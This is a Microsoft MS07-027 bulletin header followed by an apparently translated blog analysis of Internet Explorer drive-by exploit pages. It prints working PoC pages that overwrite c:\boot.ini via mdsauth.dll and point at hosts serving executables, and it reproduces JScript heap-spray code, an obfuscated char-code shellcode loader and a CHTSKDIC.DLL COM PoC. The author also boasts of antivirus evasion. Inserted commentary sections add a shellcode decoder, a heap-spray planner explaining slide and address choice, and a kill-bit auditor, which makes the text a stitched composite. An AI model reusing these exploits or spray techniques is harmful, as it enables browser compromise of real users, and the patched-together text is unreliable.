Microsoft Security Bulletin MS07-027

Cumulative Security Update for Internet Explorer (931768)
Published: May 8, 2007 | Updated: May 16, 2007
Version: 1.2

Summary
Who should read this document: Customers who use Microsoft Windows
Impact of vulnerability: Remote code execution
Maximum severity rating: Critical
Recommendation: Customers should apply the update immediately
Security update replacement: This bulletin replaces several prior security updates. See the Frequently Asked Questions (FAQ) section of this bulletin for details.
Caveats: Microsoft Knowledge Base Article 931768 documents the currently known issues that customers may experience when installing this security update, together with the recommended solutions. See Microsoft Knowledge Base Article 931768 for details.

Tested software and security update download locations:

Affected software:
• Microsoft Windows 2000 Service Pack 4
• Microsoft Windows XP Service Pack 2
• Microsoft Windows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2
• Microsoft Windows Server 2003 Service Pack 1 and Microsoft Windows Server 2003 Service Pack 2
• Microsoft Windows Server 2003 SP1 for Itanium-based Systems and Microsoft Windows Server 2003 SP2 for Itanium-based Systems
• Microsoft Windows Server 2003 x64 Edition Service Pack 1 and Microsoft Windows Server 2003 x64 Edition Service Pack 2
• Windows Vista
• Windows Vista x64 Edition

Tested Microsoft Windows components:

Affected components:
• Microsoft Internet Explorer 5.01 Service Pack 4 on Windows 2000 Service Pack 4
• Microsoft Internet Explorer 6 Service Pack 1 installed on Windows 2000 Service Pack 4
• Microsoft Internet Explorer 6 for Windows XP Service Pack 2
• Microsoft Internet Explorer 6 for Windows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2
• Microsoft Internet Explorer 6 for Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2
• Microsoft Internet Explorer 6 for Windows Server 2003 SP1 for Itanium-based Systems and Windows Server 2003 SP2 for Itanium-based Systems
• Microsoft Internet Explorer 6 for Windows Server 2003 x64 Edition Service Pack 1 and Windows Server 2003 x64 Edition Service Pack 2
• Microsoft Internet Explorer 7 for Windows XP Service Pack 2
• Windows Internet Explorer 7 for Windows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2
• Windows Internet Explorer 7 for Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2
• Windows Internet Explorer 7 for Windows Server 2003 SP1 for Itanium-based Systems and Windows Server 2003 SP2 for Itanium-based Systems
• Windows Internet Explorer 7 for Windows Server 2003 x64 Edition Service Pack 1 and Windows Server 2003 x64 Edition Service Pack 2
• Windows Internet Explorer 7 in Windows Vista
• Windows Internet Explorer 7 in Windows Vista x64 Edition

-----------------------

Analysis of MS07-027 drive-by exploit pages (MS07027漏洞网站挂马分析) 2007-05-25 19:11

On May 16 Microsoft updated the Internet Explorer patch for this vulnerability. The bug does not seem to be widely exploited, but tools for exploiting MS07-027 are already circulating online; I know of two: "MS07027网马生成器" (MS07027 web-trojan generator) and "最新MS07027+免杀ANI超强高效率网马生成器" (latest MS07027 + AV-evading ANI super-efficient web-trojan generator).

1. The MS07027网马生成器 generates a single file, MS07027.html, with the following content:

<html>
<title> MS07-027 Oday </title>
<body>
<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0"> </OBJECT>
<script language="vbscript">
target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"
target.SessionAuthor="Andres Tarasco Acuna"
target.SessionEmailContact="atarasco_at_gmail.com"
target.SessionURL="http://127.0.0.1/0.exe"
target.SaveAs "c:\boot.ini"
<script src="inject.js"></script>
</script>
</body>
</html>

I first saw this code on my friend Hysia's blog, but this MS07027网马生成器 is obviously a fake: it never produces the shellcode at all. The shellcode should live in inject.js, yet the generator never creates that file; all you get is MS07027.html. And the full shellcode has not been published online either, only part of it:

function PrepMem() {
    //Standard Heap Spray Code
    var heapSprayToAddress = 0x06060606;          // address the exploit redirects execution to
    var payLoadCode = HeapRepairCode + Shellcode; // both strings are defined elsewhere (not published)
    var heapBlockSize = 0x400000;                 // 4 MB per sprayed block
    var payLoadSize = payLoadCode.length * 2;     // JScript strings are UTF-16: 2 bytes per char
    var spraySlideSize = heapBlockSize - (payLoadSize+0x38); // leave room for string/heap headers
    var spraySlide = unescape("%u9090%u9090");    // NOP slide
    spraySlide = getSpraySlide(spraySlide,spraySlideSize);
    heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize; // blocks needed to reach the target
    memory = new Array();
    for (i=0;i<heapBlocks;i++) {
        memory[i] = spraySlide + payLoadCode;     // keep every block referenced so it stays allocated
    }
    function getSpraySlide(spraySlide, spraySlideSize) {
        while (spraySlide.length*2<spraySlideSize) {
            spraySlide += spraySlide;             // double until at least spraySlideSize bytes
        }
        spraySlide = spraySlide.substring(0,spraySlideSize/2); // trim to exactly spraySlideSize bytes
        return spraySlide;
    }
}

function GetSystemVersion() {
    //Simple Detecting of OS version out of Jscript version:
    var ver = "";
    ver += ScriptEngineMajorVersion();   // e.g. "5"
    ver += ScriptEngineMinorVersion();   // e.g. "6"
    ver += ScriptEngineBuildVersion();   // e.g. "8820" -> "568820", compared as a number below
    if      ( ver<568820 ){ return("preSP2"); }
    else if ( ver<575730 ){ return("SP2"); }
    else return (0);
}

2. Then there is the so-called "最新MS07027+免杀ANI超强高效率网马生成器", which generates a file named fyms07027.htm. My machine did not have this patch installed, so I set up IIS to test it. It did something: the first time, the machine crashed and rebooted outright. On further testing I found the code runs far too slowly; after waiting a long time the expected result never appeared, so I stopped testing. The source of fyms07027.htm is as follows:

<html>
<body>
<SCRIPT language="javascript">
function rechange(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chr(eval(s(i)))
Next
rechange=t
End Function
t="115,104,101,108,108,99,111,100,101,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,52,51,52,51,34,43,34,37,117,52,51,52,51,34,43,34,37,117,52,51,101,98,37,117,53,55,53,54,37,117,52,53,56,98,37,117,56,98,51,99,37,117,48,53,53,52,37,117,48,49,55,56,37,117,53,50,101,97,37,117,53,50,56,98,37,117,48,49,50,48,37,117,51,49,101,97,37,117,51,49,99,48,37,117,52,49,99,57,37,117,51,52,56,98,37,117,48,49,56,97,37,117,51,49,101,101,37,117,99,49,102,102,37,117,49,51,99,102,37,117,48,49,97,99,37,117,56,53,99,55,37,117,55,53,99,48,37,117,51,57,102,54,37,117,55,53,100,102,37,117,53,97,101,97,37,117,53,97,56,98,37,117,48,49,50,52,37,117,54,54,101,98,37,117,48,99,56,98,37,117,56,98,52,98,37,117,49,99,53,97,37,117,101,98,48,49,37,117,48,52,56,98,37,117,48,49,56,98,37,117,53,102,101,56,37,117,102,102,53,101,37,117,102,99,101,48,37,117,99,48,51,49,37,117,56,98,54,52,37,117,51,48,52,48,37,117,52,48,56,98,37,117,56,98,48,99,37,117,49,99,55,48,37,117,56,98,97,100,37,117,48,56,54,56,37,117,99,48,51,49,37,117,98,56,54,54,37,117,54,99,54,99,37,117,54,56,53,48,37,117,51,50,51,51,37,117,54,52,50,101,37,117,55,55,54,56,37,117,51,50,55,51,37,117,53,52,53,102,37,117,55,49,98,98,37,117,101,56,97,55,37,117,101,56,102,101,37,117,102,102,57,48,37,117,102,102,102,102,37,117,101,102,56,57,37,117,99,53,56,57,37,117,99,52,56,49,37,117,102,101,55,48,37,117,102,102,102,102,37,117,51,49,53,52,37,117,102,101,99,48,37,117,52,48,99,52,37,117,98,98,53,48,37,117,55,100,50,50,37,117,55,100,97,98,37,117,55,53,101,56,37,117,102,102,102,102,37,117,51,49,102,102,37,117,53,48,99,48,37,117,53,48,53,48,37,117,52,48,53,48,37,117,52,48,53,48,37,117,98,98,53,48,37,117,53,53,97,54,37,117,55,57,51,52,37,117,54,49,101,56,37,117,102,102,102,102,37,117,56,57,102,102,37,117,51,49,99,54,37,117,53,48,99,48,37,117,51,53,53,48,37,117,48,49,48,50,37,117,99,99,55,48,37,117,99,99,102,101,37,117,56,57,53,48,37,117,53,48,101,48,37,117,49,48,54,97,37,117,53,54,53,48,37,117,56,49,98,98,37,117,50,99,98,52,37,117,101,56,98,101,37,117,102,102,52,50,37,117,102,102,102,102,37,117,99,48,51,49,37,117,53,54,53,48,37,117,100,51,98,98,37,117,53,56,102,97,37,117,101,56,57,98,37,117,102,102,51,52,37,117,102,102,102,102,37,117,54,48,53,56,37,117,49,48,54,97,37,117,53,48,53,52,37,117,98,98,53,54,37,117,102,51,52,55,37,117,99,54,53,54,37,117,50,51,101,56,37,117,102,102,102,102,37,117,56,57,102,102,37,117,51,49,99,54,37,117,53,51,100,98,37,117,50,101,54,56,37,117,54,100,54,51,37,117,56,57,54,52,37,117,52,49,101,49,37,117,100,98,51,49,37,117,53,54,53,54,37,117,53,51,53,54,37,117,51,49,53,51,37,117,102,101,99,48,37,117,52,48,99,52,37,117,37,117,99,48,51,49,37,117,98,56,54,54,37,117,54,99,54,99,37,117,54,56,53,48,37,117,51,50,51,51,37,117,54,52,50,101,37,117,55,55,54,56,37,117,51,50,55,51,37,117,53,52,53,102,37,117,55,49,98,98,37,117,101,56,97,55,37,117,101,56,102,101,37,117,102,102,57,48,37,117,102,102,102,102,37,117,101,102,56,57,37,117,99,53,56,57,37,117,99,52,56,49,37,117,102,101,55,48,37,117,102,102,102,102,37,117,51,49,53,52,37,117,102,101,99,48,37,117,52,48,99,52,37,117,98,98,53,48,37,117,55,100,50,50,37,117,55,100,97,98,37,117,55,53,101,56,37,117,102,102,102,102,37,117,51,49,102,102,37,117,53,48,99,48,37,117,53,48,53,48,37,117,52,48,53,48,37,117,52,48,53,48,37,117,98,98,53,48,37,117,53,53,97,54,37,117,55,57,51,52,37,117,54,49,101,56,37,117,102,102,102,102,37,117,56,57,102,102,37,117,51,49,99,54,37,117,53,48,99,48,37,117,51,53,53,48,37,117,48,49,48,50,37,117,99,99,55,48,37,117,99,99,102,101,37,117,56,57,53,48,37,117,53,48,101,48,37,117,49,48,54,97,37,117,53,54,53,48,37,117,56,49,98,98,37,117,50,99,98,52,37,117,101,56,98,101,37,117,102,102,52,50,37,117,102,102,102,102,37,117,99,48,51,49,37,117,53,54,53,48,37,117,100,51,98,98,37,117,53,56,102,97,37,117,101,56,57,98,37,117,102,102,51,52,37,117,102,102,102,102,37,117,54,48,53,56,37,117,49,48,54,97,37,117,53,48,53,52,37,117,98,98,53,54,37,117,102,51,52,55,37,117,99,54,53,54,37,117,50,51,101,56,37,117,102,102,102,102,37,117,56,57,102,102,37,117,51,49,99,54,37,117,53,51,100,98,37,117,50,101,54,56,37,117,54,100,54,51,37,117,56,57,54,52,37,117,52,49,101,49,37,117,100,98,51,49,37,117,53,54,53,54,37,117,53,51,53,54,37,117,51,49,53,51,37,117,102,101,99,48,37,117,52,48,99,52,37,117,13,10,53,51,53,48,37,117,53,51,53,51,37,117,53,51,53,51,37,117,53,51,53,51,37,117,53,51,53,51,37,117,54,97,53,51,37,117,56,57,52,52,37,117,53,51,101,48,37,117,53,51,53,51,37,117,53,52,53,51,37,117,53,51,53,48,37,117,53,51,53,51,37,117,53,51,52,51,37,117,53,51,52,98,37,117,53,49,53,51,37,117,56,55,53,51,37,117,98,98,102,100,37,117,100,48,50,49,37,117,100,48,48,53,37,117,100,102,101,56,37,117,102,102,102,101,37,117,53,98,102,102,37,117,99,48,51,49,37,117,53,48,52,56,37,117,98,98,53,51,37,117,99,98,52,51,37,117,53,102,56,100,37,117,99,102,101,56,37,117,102,102,102,101,37,117,53,54,102,102,37,117,101,102,56,55,37,117,49,50,98,98,37,117,54,100,54,98,37,117,101,56,100,48,37,117,102,101,99,50,37,117,102,102,102,102,37,117,99,52,56,51,37,117,54,49,53,99,37,117,56,57,101,98,34,41,59,10,13,10,98,105,103,98,108,111,99,107,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,48,68,48,68,37,117,48,68,48,68,34,41,59,10,13,10,104,101,97,100,101,114,115,105,122,101,32,61,32,50,48,59,10,13,10,115,108,97,99,107,115,112,97,99,101,32,61,32,104,101,97,100,101,114,115,105,122,101,43,115,104,101,108,108,99,111,100,101,46,108,101,110,103,116,104,13,10,10,119,104,105,108,101,32,40,98,105,103,98,108,111,99,107,46,108,101,110,103,116,104,60,115,108,97,99,107,115,112,97,99,101,41,32,98,105,103,98,108,111,99,107,43,61,98,105,103,98,108,111,99,107,59,13,10,10,102,105,108,108,98,108,111,99,107,32,61,32,98,105,103,98,108,111,99,107,46,115,117,98,115,116,114,105,110,103,40,48,44,32,115,108,97,99,107,115,112,97,99,101,41,59,10,98,108,111,99,107,32,61,32,98,105,103,98,108,111,99,107,46,115,117,98,115,116,114,105,110,103,40,48,44,32,98,105,103,98,108,111,99,107,46,108,101,110,103,116,104,45,115,108,97,99,107,115,112,97,99,101,41,59,13,10,10,119,104,105,108,101,40,98,108,111,99,107,46,108,101,110,103,116,104,43,115,108,97,99,107,115,112,97,99,101,60,48,120,52,48,48,48,48,41,32,98,108,111,99,107,32,61,32,98,108,111,99,107,43,98,108,111,99,107,43,102,105,108,108,98,108,111,99,107,59,13,10,10,109,101,109,111,114,121,32,61,32,110,101,119,32,65,114,114,97,121,40,41,59,10,102,111,114,32,40,105,61,48,59,105,60,55,53,48,59,105,43,43,41,32,109,101,109,111,114,121,91,105,93,32,61,32,98,108,111,99,107,32,43,32,115,104,101,108,108,99,111,100,101,59,10"
i=t
execute(rechange(I))
</SCRIPT>
<object classid="CLSID:03D9F3F2-B0E3-11D2-B081-006008039BF0"></object>
<!-- note: this object is not the MS07-027 object -->
Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit by the FrSIRT < http://www.fy.com > Solution - http://www.fy.com/</body><script>location.reload();</script>
</html>

After fully decoding it, I found it was strange garbage. I don't know why... Anyone interested can decode it, or run the code and see what happens. I suppose these are the reasons that limit the exploitation of MS07-027. Having looked at a lot of exploitable vulnerabilities, MS07-017 and MS06-014 are still the two classics!

---------------

Today I finally got it working in the debugger. The effect is basically the same as MS06-014 and it gets past every antivirus product. Only part of the debugging code is being made public; for fear of causing chaos, I am publishing just a portion of it for now.
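Decoding the t string: an added example, not code from the page or from the generator. Read alongside the page's rechange(), the comma-separated values are nothing but character codes, so the loader is trivial to undo offline. Decoded, the string is JScript and has nothing to do with MS07-027: it begins shellcode = unescape("%u4343"+"%u4343"+...), builds bigblock = unescape("%u0D0D%u0D0D") and fills 750 entries of block + shellcode, i.e. the %u0D0D heap spray of the javaprxy.dll exploit (CLSID 03D9F3F2-...) whose banner is printed at the bottom of the file. It also contains a stray %u%u and a raw CR LF inside the shellcode string literal, which JScript rejects as an unterminated string; and the <SCRIPT language="javascript"> block meant to run it is written in VBScript (Split, Chr, UBound, Execute), so IE's JScript engine fails on it before any of this is reached. The Node.js code below reproduces the two decoding steps on a constructed sample (the first 52 values of the page's t string, with the codes for "); appended so the literal is complete), converts the %uXXXX escapes to the little-endian bytes the string occupies in memory, and flags the two kinds of damage just described.

```javascript
'use strict';
// Added example (not from the page or the generator): a Node.js decoder for the
// fyms07027.htm obfuscation. The page's rechange() turns "115,104,..." into text
// with Chr() and then Execute()s it; this does the same decoding offline, then
// pulls the %uXXXX escapes out of the recovered script and turns them into the
// little-endian bytes that unescape() would leave in memory.

// Constructed sample: the first 52 values of the page's t string, with the
// three codes for  ");  appended so the string literal is complete.
const SAMPLE_T = '115,104,101,108,108,99,111,100,101,32,61,32,117,110,101,115,99,97,112,101,40,34,' +
  '37,117,52,51,52,51,34,43,34,37,117,52,51,52,51,34,43,34,37,117,52,51,101,98,37,117,53,55,53,54,34,41,59';

// Equivalent of the page's VBScript rechange(k): Split on ",", Chr() each value.
function decodeCharCodes(t) {
  return t.split(',')
    .map((s) => s.trim())
    .filter((s) => s.length > 0)
    .map((s) => {
      const n = Number(s);
      if (!Number.isInteger(n) || n < 0 || n > 0xffff) throw new Error(`bad char code: ${s}`);
      return String.fromCharCode(n);
    })
    .join('');
}

// Convert %uXXXX escapes to the bytes a JScript string holds in memory (UTF-16LE),
// the layout a heap spray relies on. Also count "%u" tokens not followed by four
// hex digits and raw CR/LF inside a "..." literal (escaped quotes are not handled,
// the decoded script has none); either makes the generated script unrunnable.
function analyzeUnescapeShellcode(script) {
  const escapes = script.match(/%u[0-9a-fA-F]{4}/g) || [];
  const bytes = Buffer.alloc(escapes.length * 2);
  escapes.forEach((e, i) => {
    const v = parseInt(e.slice(2), 16);
    bytes[2 * i] = v & 0xff;        // low byte first: %u43eb lands as EB 43
    bytes[2 * i + 1] = v >> 8;
  });
  const malformedEscapes = (script.match(/%u(?![0-9a-fA-F]{4})/g) || []).length;
  let inQuote = false;
  let controlCharInString = false;
  for (const ch of script) {
    if (ch === '"') inQuote = !inQuote;
    else if (inQuote && (ch === '\r' || ch === '\n')) controlCharInString = true;
  }
  return { escapes, hex: bytes.toString('hex'), malformedEscapes, controlCharInString };
}

function decodeSample() {
  const script = decodeCharCodes(SAMPLE_T);
  return { script, ...analyzeUnescapeShellcode(script) };
}

if (typeof require !== 'undefined' && require.main === module) {
  const r = decodeSample();
  console.log(r.script);
  console.log('shellcode bytes:', r.hex, 'malformed %u:', r.malformedEscapes);
}
```

The sample decodes to shellcode = unescape("%u4343"+"%u4343"+"%u43eb%u5756"); and to the bytes 43 43 43 43 eb 43 56 57 (0x43 is inc ebx, a common NOP-equivalent filler). Feeding the page's complete t string to decodeCharCodes() recovers the whole spray script; analyzeUnescapeShellcode() then reports a nonzero malformedEscapes and controlCharInString true, which is the damage behind the "strange garbage" the author reports.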
<html>
<title> MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification </title>
<body>
<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0"> </OBJECT>
<script language="vbscript">
//next script is converted to UTF16
target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"
target.SessionAuthor="Andres Tarasco Acuna"
target.SessionEmailContact="atarasco_at_gmail.com"
target.SessionURL="http://192.168.1.168/1.exe"
target.SaveAs "c:\boot.ini"
<script src="inject.js"></script>
</script>
</body>
</html>

Below is part of the shellcode:

===========///ms07-027 exploit ///================

function PrepMem() {
    //Standard Heap Spray Code
    var heapSprayToAddress = 0x06060606;          // address the exploit redirects execution to
    var payLoadCode = HeapRepairCode + Shellcode; // both strings are defined elsewhere (not published)
    var heapBlockSize = 0x400000;                 // 4 MB per sprayed block
    var payLoadSize = payLoadCode.length * 2;     // JScript strings are UTF-16: 2 bytes per char
    var spraySlideSize = heapBlockSize - (payLoadSize+0x38); // leave room for string/heap headers
    var spraySlide = unescape("%u9090%u9090");    // NOP slide
    spraySlide = getSpraySlide(spraySlide,spraySlideSize);
    heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize; // blocks needed to reach the target
    memory = new Array();
    for (i=0;i<heapBlocks;i++) {
        memory[i] = spraySlide + payLoadCode;     // keep every block referenced so it stays allocated
    }
    function getSpraySlide(spraySlide, spraySlideSize) {
        while (spraySlide.length*2<spraySlideSize) {
            spraySlide += spraySlide;             // double until at least spraySlideSize bytes
        }
        spraySlide = spraySlide.substring(0,spraySlideSize/2); // trim to exactly spraySlideSize bytes
        return spraySlide;
    }
}

function GetSystemVersion() {
    //Simple Detecting of OS version out of Jscript version:
    var ver = "";
    ver += ScriptEngineMajorVersion();   // e.g. "5"
    ver += ScriptEngineMinorVersion();   // e.g. "6"
    ver += ScriptEngineBuildVersion();   // e.g. "8820" -> "568820", compared as a number below
    if      ( ver<568820 ){ return("preSP2"); }
    else if ( ver<575730 ){ return("SP2"); }
    else return (0);
}

I will put together a demo video for everyone; this is only part of the code!

-------------------------

Test method:

WARNING: The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!
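The heap spray arithmetic in PrepMem(), as an added dry run that is not code from the page. PrepMem() never says why 0x06060606 or 4 MB blocks should work; the planner below repeats its sizes without allocating anything and checks the three properties the spray depends on: that the loop creates enough blocks to reach the target address (the condition i<heapBlocks with a fractional heapBlocks rounds up), that the target falls inside a block's NOP slide rather than inside its payload, and what four bytes memory holds at the target. The last point is the caveat a practitioner wants: a %u9090 slide puts 0x90909090 at 0x06060606, so this spray only helps when the bug sets EIP to that address directly; a bug that instead reads a pointer out of the sprayed memory needs a self-referential slide such as %u0c0c at 0x0c0c0c0c, which the second call shows. Note also that the SaveAs PoC above is, as its own title says, an arbitrary file modification; the spray is the generic IE code-execution half of such a page and is independent of it. Assumed rather than given by the page: blocks start at 0x400000 and sit end to end, and the payload length used below is a placeholder, since the real HeapRepairCode + Shellcode are not published.

```javascript
'use strict';
// Added example (not code from the page or the generator): a dry-run planner for
// the PrepMem() heap spray. It repeats PrepMem()'s size arithmetic without
// allocating anything and reports how many blocks the loop makes, whether the
// target lands in a block's NOP slide or in its payload, and what 4-byte value
// memory would hold at the target address.
//
// Assumptions (not stated on the page): blocks are modelled as starting at
// 0x400000 and lying end to end at blockSize intervals, the overhead is the 0x38
// bytes PrepMem subtracts, and payloadChars is a placeholder because the page
// never gives the real HeapRepairCode + Shellcode.

const UTF16_BYTES_PER_CHAR = 2; // payLoadSize = payLoadCode.length * 2 in PrepMem

function planSpray({ target, blockSize, payloadChars, slideWord, firstBlockBase = 0x400000 }) {
  const payloadBytes = payloadChars * UTF16_BYTES_PER_CHAR;
  const slideBytes = blockSize - (payloadBytes + 0x38);   // PrepMem's spraySlideSize
  // PrepMem's loop is for (i = 0; i < heapBlocks; i++) with a fractional
  // heapBlocks, so the number of blocks is ceil(), not floor().
  const heapBlocks = (target - firstBlockBase) / blockSize;
  const blockCount = Math.ceil(heapBlocks);
  const lastBlockEnd = firstBlockBase + blockCount * blockSize;
  const covered = target >= firstBlockBase && target < lastBlockEnd;
  // Which block does the target fall in, and where inside it?
  const blockIndex = Math.floor((target - firstBlockBase) / blockSize);
  const offsetInBlock = (target - firstBlockBase) - blockIndex * blockSize;
  const inSlide = covered && offsetInBlock < slideBytes;
  const nopsToPayload = inSlide ? slideBytes - offsetInBlock : -1;
  // The slide is one 16-bit word repeated, so any 4-byte read inside it returns
  // that word twice (little-endian, so the value is the same at any offset).
  const valueAtTarget = inSlide ? ((slideWord << 16) | slideWord) >>> 0 : null;
  const selfReferential = valueAtTarget === target;
  return { blockCount, totalBytes: blockCount * blockSize, slideBytes, covered,
           blockIndex, offsetInBlock, inSlide, nopsToPayload, valueAtTarget, selfReferential };
}

// The page's parameters: target 0x06060606, 4 MB blocks, %u9090 slide.
function planPagesSpray(payloadChars = 400 /* placeholder, see above */) {
  return planSpray({ target: 0x06060606, blockSize: 0x400000, payloadChars, slideWord: 0x9090 });
}

if (typeof require !== 'undefined' && require.main === module) {
  const p = planPagesSpray();
  console.log(`blocks: ${p.blockCount} (${(p.totalBytes / 1048576).toFixed(0)} MB sprayed)`);
  console.log(`target in block ${p.blockIndex} at offset 0x${p.offsetInBlock.toString(16)}, ` +
              `${p.inSlide ? 'inside the slide, ' + p.nopsToPayload + ' NOPs before the payload' : 'INSIDE THE PAYLOAD'}`);
  console.log(`memory at target: 0x${p.valueAtTarget.toString(16)}, self-referential: ${p.selfReferential}`);
  const q = planSpray({ target: 0x0c0c0c0c, blockSize: 0x400000, payloadChars: 400, slideWord: 0x0c0c });
  console.log(`0x0c0c0c0c with a %u0c0c slide: self-referential: ${q.selfReferential}`);
}
```

For the page's numbers the loop runs 24 times (96 MB), 0x06060606 sits 0x60606 bytes into block 23, well inside the slide, and the value there is 0x90909090. Swapping in 0x0c0c0c0c with a %u0c0c slide gives a value equal to the address, which is what makes that classic pair usable as both a pointer and instructions.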
=============== CHTSKDIC.DLL.htm start ================
<!--
// Internet Explorer (CHTSKDIC.DLL) COM Object Instantiation Vulnerability
// tested XP SP2 CN
// http://www.xsec.org
// nop (nop#xsec.org)
// CLSID: {BE4191FB-59EF-4825-AEFC-109727951E42}
// Info: ImeSingleKanjiDict
// ProgID: ID2
// InprocServer32: C:\WINDOWS\IME\CHTIME\APPLETS\CHTSKDIC.DLL
!-->
<html><body>
<object classid="CLSID:{BE4191FB-59EF-4825-AEFC-109727951E42}" ></object>
</body></html>
=============== CHTSKDIC.DLL.htm end ==================
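CHTSKDIC.DLL.htm, like the two object tags earlier on the page, does nothing beyond instantiating a COM object by CLSID, so the defensive question is whether IE will create the object at all. The control for that is the ActiveX kill bit: bit 0x400 of the Compatibility Flags DWORD under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID} (32-bit IE on x64 Windows reads the copy under Wow6432Node). The following is an added example, not from the page: it extracts every classid from an HTML file and matches it against a .reg export of that key, as produced by reg export "HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility" ax.reg. The HTML sample reuses the three object tags from this page; the registry contents are constructed for the example and do not describe any real machine.

```javascript
'use strict';
// Added example (not from the page): given an HTML page and a .reg export of IE's
// ActiveX Compatibility key, list every CLSID the page instantiates and whether
// the kill bit blocks it. The kill bit is bit 0x400 of the "Compatibility Flags"
// DWORD under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID};
// when set, IE refuses to create the object even though the DLL is installed.
// The export would come from:
//   reg export "HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility" ax.reg

const KILL_BIT = 0x400;

// Constructed sample: the three <object> tags that appear on this page.
const SAMPLE_HTML = `
<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0"> </OBJECT>
<object classid="CLSID:03D9F3F2-B0E3-11D2-B081-006008039BF0"></object>
<object classid="CLSID:{BE4191FB-59EF-4825-AEFC-109727951E42}" ></object>
`;

// Constructed .reg export; the values are made up for the example.
const SAMPLE_REG = `Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{03D9F3F2-B0E3-11D2-B081-006008039BF0}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{BE4191FB-59EF-4825-AEFC-109727951E42}]
"Compatibility Flags"=dword:00000001
`;

// Pull every classid CLSID out of the HTML, normalised to upper case without braces.
function extractClassIds(html) {
  const re = /classid\s*=\s*["']?\s*clsid:\s*\{?([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\}?/gi;
  const ids = [];
  let m;
  while ((m = re.exec(html)) !== null) ids.push(m[1].toUpperCase());
  return ids;
}

// Parse the .reg export into a Map of CLSID -> Compatibility Flags. Only subkeys
// directly under ActiveX Compatibility are considered.
function parseCompatFlags(regText) {
  const flags = new Map();
  let current = null;
  for (const rawLine of regText.split(/\r?\n/)) {
    const line = rawLine.trim();
    const key = line.match(/^\[.*\\ActiveX Compatibility\\\{([0-9A-Fa-f-]{36})\}\]$/);
    if (key) { current = key[1].toUpperCase(); continue; }
    if (line.startsWith('[')) { current = null; continue; }
    const val = line.match(/^"Compatibility Flags"=dword:([0-9A-Fa-f]{8})$/);
    if (val && current) flags.set(current, parseInt(val[1], 16));
  }
  return flags;
}

// Report each instantiated CLSID with its flags and whether the kill bit is set.
// A CLSID with no entry has flags 0, i.e. it is not blocked.
function auditPage(html, regText) {
  const flags = parseCompatFlags(regText);
  return extractClassIds(html).map((clsid) => {
    const f = flags.has(clsid) ? flags.get(clsid) : 0;
    return { clsid, flags: f, killBit: (f & KILL_BIT) !== 0 };
  });
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of auditPage(SAMPLE_HTML, SAMPLE_REG)) {
    console.log(`${r.clsid}  flags=0x${r.flags.toString(16).padStart(8, '0')}  ` +
                (r.killBit ? 'blocked by kill bit' : 'NOT kill-bitted'));
  }
}
```

On the constructed data only 03D9F3F2-... is blocked; BE4191FB-... has a flags value set but not the kill bit, which is the case the mask catches, and d4fe6227-... has no entry at all. Run against a real export, an unblocked CLSID whose DLL is present means the page can still instantiate the object, whatever else the browser's patch level is.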
Original post: https://www.cnblogs.com/adodo1/p/4327839.html